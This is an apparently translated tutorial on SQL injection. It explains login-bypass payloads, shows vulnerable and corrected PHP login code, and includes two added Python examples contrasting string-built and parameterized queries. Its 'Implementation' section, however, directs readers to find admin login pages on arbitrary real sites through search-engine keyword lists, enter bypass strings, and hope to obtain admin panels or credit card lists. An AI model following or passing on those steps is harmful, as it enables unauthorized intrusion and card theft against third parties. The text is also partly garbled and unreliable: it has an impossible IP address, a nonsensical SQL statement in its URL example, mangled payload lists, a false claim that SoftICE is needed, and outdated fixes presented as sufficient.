SQL injection is an exploit type in which the attacker adds SQL (Structured Query Language) code to a web form input box or to a web address in order to gain access to the server's database. SQL injection occurs when the attacker can insert SQL statements into the application's query by manipulating the data sent to an application page.
SQL injection is possible when the input box applies no character filter for characters such as the quote character and the double minus (--). A hacker can insert SQL commands through a parameter or a form field.
Why SQL injection is dangerous:
1) This technique allows someone to log into the system without having an account.
2) SQL injection also allows a hacker to delete or add database records, which causes the server to malfunction.
To perform SQL injection one needs only a browser, a personal computer with an internet connection, and kernel-mode debugger software such as SoftICE.
SQL injection syntax with PHP:
1) $sql = "select * from login where username = '$username' and password = '$password'"; (the variables come from GET or POST)
2) Enter the string ' or ''= as the password
3) The resulting SQL is: select * from login where username = '$username' and password = '' or ''='' (the WHERE condition of this SELECT is always TRUE)
4) In this way SQL syntax (here an OR) is injected into the SQL query.
SQL injection syntax:
1) Append the string '-- after the username
2) Original database query:
select * from user where name = 'bob' and password = 'robot'
Changed to:
select * from user where name = 'bob'--' and password = 'xxx'
(everything after -- is a comment, so the password check is never evaluated)
Example: SQL injection via the URL:
http://10.344.102.233/web1/index.php?option=product.php&status=1; update cost order set ordered where = 50 = 9;
To prevent SQL injection:
1) Change the PHP script
2) Use mysql_escape_string
3) Filter the ' character and modify php.ini
1. Modify the PHP script
Example of the PHP script:
$query = "select id, name, email, password, type, block from user "
       . "where email = '$Email' and password = '$password'";   // $Email and $password come straight from the form
$result = mysql_query($query, $id_mysql);
while ($row = mysql_fetch_row($result)) {
    $id       = $row[0];
    $name     = $row[1];
    $email    = $row[2];
    $password = $row[3];
    $type     = $row[4];
    $block    = $row[5];
}
if (strcmp($block, 'yes') == 0) {
    echo "\n";
    exit();
} else if (!empty($id) && !empty($name) && !empty($email) && !empty($password)) {
    // ... login succeeds (the rest of this branch is not shown on the page)
}
The script above allows someone to log in by entering SQL commands into the login form. When the hacker enters the string ' or ''= into the form fields, the query becomes:
select id, name, email, password, type, block from user where email = '' or ''='' and password = '' or ''=''
which is always TRUE.
So, change the script as below:
$input_password = $password;   // keep the submitted password; it is no longer placed in the SQL
$query = "select id, name, email, password, type, block from user "
       . "where email = '$Email'";   // note: $Email is still interpolated; escape it (section 2) or use a prepared statement
$result = mysql_query($query, $id_mysql);
while ($row = mysql_fetch_row($result)) {
    $id       = $row[0];
    $name     = $row[1];
    $email    = $row[2];
    $password = $row[3];
    $type     = $row[4];
    $block    = $row[5];
}
if (strcmp($block, 'yes') == 0) {
    echo "\n";
    exit();
}
$pass = md5($input_password);   // md5 as on the page; password_hash()/password_verify() is the modern choice
if (strcmp($Email, $email) == 0 && strcmp($pass, $password) == 0) {
    // ... login succeeds: the password is compared in PHP, not inside the SQL
}
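The two scripts above, as an added worked example that is not code from the page: a Python/sqlite3 re-creation of the vulnerable login (both inputs pasted into the SQL text) beside the corrected design (password never enters the SQL, email passed as a bound parameter, comparison done in application code). The user table and its rows are constructed sample data; passwords are stored in clear here only so that the vulnerable query text matches the page's first script exactly, and the page's md5 step would sit in the comparison inside safe_login. The block runs the page's two payloads (' or ''= and '--) against each version.

```python
import hmac
import sqlite3

# Constructed sample users, mirroring the columns of the page's "user" table.
# Passwords are stored in clear here so that vulnerable_login() builds exactly
# the query text the page's first script builds; a real application stores a
# password hash and compares it in safe_login() instead (the page uses md5;
# PHP's password_hash()/password_verify() is the modern equivalent).
SAMPLE_USERS = [
    (1, "bob",   "bob@example.com",   "robot",  "user",  "no"),
    (2, "alice", "alice@example.com", "s3cret", "admin", "no"),
    (3, "carol", "carol@example.com", "pw",     "user",  "yes"),   # blocked account
]

def make_db():
    """In-memory SQLite database holding the constructed sample users."""
    db = sqlite3.connect(":memory:")
    db.execute("create table user (id integer, name text, email text, "
               "password text, type text, block text)")
    db.executemany("insert into user values (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db

def build_vulnerable_query(email, password):
    """The query shape of the page's first script: both inputs are pasted into the SQL text."""
    return ("select id, name, email, password, type, block from user "
            f"where email = '{email}' and password = '{password}'")

def vulnerable_login(db, email, password):
    """Return the name of the matched user, or None.  The WHERE clause is under
    the attacker's control, so the page's payloads make it match a row."""
    row = db.execute(build_vulnerable_query(email, password)).fetchone()
    if row is None or row[5] == "yes":
        return None
    return row[1]

def safe_login(db, email, password):
    """The page's corrected design, done fully: the password never enters the SQL,
    the email is passed as a bound parameter instead of being concatenated, and
    the comparison happens in application code with a constant-time compare."""
    row = db.execute("select id, name, email, password, type, block from user "
                     "where email = ?", (email,)).fetchone()
    if row is None or row[5] == "yes":                 # unknown or blocked account
        return None
    if not hmac.compare_digest(row[3].encode(), password.encode()):
        return None
    return row[1]

if __name__ == "__main__":
    db = make_db()
    for email, pw in (("bob@example.com", "robot"),      # legitimate login
                      ("' or ''='", "' or ''='"),        # page section 1 payload
                      ("bob@example.com'--", "xxx")):    # page's '-- payload
        print(repr(email), repr(pw), "vulnerable ->", vulnerable_login(db, email, pw),
              "| safe ->", safe_login(db, email, pw))
```

With the bound parameter the database driver sends the email value separately from the SQL text, so a quote or a -- inside it is just data; that is why safe_login returns None for both payloads while the legitimate credentials still work.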
2. Use mysql_escape_string
It rewrites a string containing ' so that the quote becomes \'. Example: injec'tion becomes injec\'tion. Example:
$chart = "SQL injec'tion";
$filter = mysql_escape_string($chart);
echo "Result filter: $filter";   // prints: Result filter: SQL injec\'tion
3. Filter the ' character and modify php.ini
Modify the php.ini variables to enable magic_quotes. This makes PHP turn the ' character in input strings into \' automatically.
Script example (VBScript) for filtering input:
function validatepassword(input)
    dim good_password_chars, i, c
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    validatepassword = true          ' assume valid until a disallowed character is found
    ' note: an empty input never enters the loop and is therefore accepted
    for i = 1 to len(input)
        c = mid(input, i, 1)
        if instr(good_password_chars, c) = 0 then
            validatepassword = false ' reject any character outside the allow-list
            exit function
        end if
    next
end function
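Sections 2 and 3 above, as one added worked example that is not code from the page: a Python re-implementation of the escaping mysql_escape_string() performs (an assumption written for illustration, not PHP's own routine), applied to a quoted string context and to an unquoted numeric context like the status=1 parameter in the page's URL example, beside an allow-list validator in the spirit of the page's validatepassword(). The field rules and test values are constructed.

```python
import re

# Re-implementation of the escaping mysql_escape_string() performs (an
# assumption for illustration, not PHP's own code): it backslash-escapes
# NUL, backslash, single quote, double quote, newline, carriage return and Ctrl-Z.
_ESCAPES = {"\0": "\\0", "\\": "\\\\", "'": "\\'", '"': '\\"',
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}

def mysql_escape(value):
    """Escape a string the way the page's section 2 describes (injec'tion -> injec\\'tion)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)

def quoted_string_query(name):
    """String context: the value sits between quotes, so escaping keeps the
    injected quote inside the literal and the OR never becomes SQL."""
    return f"select * from user where name = '{mysql_escape(name)}'"

def numeric_query(status):
    """Numeric context like the page's URL example (status=1): there are no quotes
    to escape, so mysql_escape() passes the payload through unchanged."""
    return f"select * from product where status = {mysql_escape(status)}"

# Allow-lists in the spirit of the page's validatepassword(): the letters it
# accepts for the password field (with a length cap added), and digits only for
# a numeric status parameter.  (Constructed rules; a real password policy would
# accept far more characters, which is safe once queries are parameterized.)
ALLOWED = {
    "password": re.compile(r"[A-Za-z]{1,64}"),
    "status": re.compile(r"[0-9]{1,9}"),
}

def validate(field, value):
    """Return True only if the whole value matches the field's allow-list.
    Unlike the page's VBScript loop, an empty string is rejected rather than
    accepted by default."""
    return ALLOWED[field].fullmatch(value) is not None

if __name__ == "__main__":
    print(mysql_escape("injec'tion"))
    print(quoted_string_query("' or ''='"))
    print(numeric_query("1 or 0=0"))
    for field, value in (("password", "robot"), ("password", "' or ''='"),
                         ("status", "9"), ("status", "1 or 0=0")):
        print(field, repr(value), validate(field, value))
```

The numeric case is the point: escaping and magic_quotes only neutralise quotes, so a parameter that is never quoted in the SQL needs type validation (the allow-list) or a bound parameter. Two further facts worth knowing when reading this section today: mysql_escape_string() ignores the connection character set, which is why mysql_real_escape_string() and then prepared statements superseded it, and magic_quotes was deprecated in PHP 5.3 and removed in PHP 5.4.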
SQL Injection Implementation
1) Go to Google or another search engine:
2) Enter one of the keywords below:
"/ admin.asp"
"/ login.asp"
"/ logon.asp"
"/ adminlogin.asp"
"/ adminlogon.asp"
"/ admin_login.asp"
"/ admin_logon.asp"
"/ admin / admin.asp"
"/ admin / login.asp"
"/ admin / logon.asp"
(you can add your own variations)
3) Open one of the links found by Google; you will most likely see a login page (user name and password).
4) Enter the following code:
User name: `or` a '=' a
Password: `or` a '=' a
5) If you are lucky, you will get the admin panel, where you can add or delete records as you want. In other cases you may get a list of credit cards.
6) If it does not work, try the other links found by Google.
7) Many code variations can be used, among others:
User name: admin
Password: `or` a '=' a
or :
'Or 0 = 0 -; "or 0 = 0 -, or 0 = 0 -' or 0 = 0 #;
"Or 0 = 0 # 'or'x' = 'x;" or "x" = "x') or ( 'x' = 'x
Other methods to prevent SQL injection:
1) Limit the length of input boxes
2) Filter input
3) Turn off or hide error messages
4) Turn off standard facilities such as stored procedures and extended stored procedures
5) Change "Startup and run SQL Server" to use a low-privileged user in the SQL Server Security tab.
Sources: securiteam, greensql, ferruh.mavituna




